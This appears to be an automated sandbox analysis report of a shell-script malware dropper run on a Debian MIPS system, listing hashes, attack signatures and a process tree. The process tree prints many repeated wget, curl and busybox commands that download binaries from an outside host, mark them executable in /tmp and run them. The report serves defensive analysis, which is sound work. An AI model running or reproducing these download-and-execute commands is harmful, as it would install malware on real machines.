Analysis
-
max time kernel
109s -
max time network
111s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipsel image:debian9-mipsel-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 03:08
Static task
static1
Behavioral task
behavioral1
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
-
Size
10KB
-
MD5
37856104cd3244a99074cb343eac4703
-
SHA1
067e09ba3ab17bad4bec316fe86b6d0555be2e31
-
SHA256
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2
-
SHA512
64e778d30cc82f4e4a6e9665a5a48168a3d8b0fa03b309a9d3623444b35b8240ce213d33cf62e6e3347a8e241746106a11e57180ade70d093b4ea67103154b9b
-
SSDEEP
192:QPLoN9Iz2SdM0DrmLj/+JJzzXkYkBiyYPLoN9E2SdM05YkBiyHj/+JJBd:QPLoN9Iz2SdM0DrmUzX1PLoN9E2SdM04
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl (identical entry repeated for each curl process)
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:724
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:792
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:851
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:872
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:921
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:942
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:991
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:1005
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1008
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1009
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1010
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- System Network Configuration Discovery
PID:1012
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:1013
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:1014
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1015
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- System Network Configuration Discovery
PID:1016
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
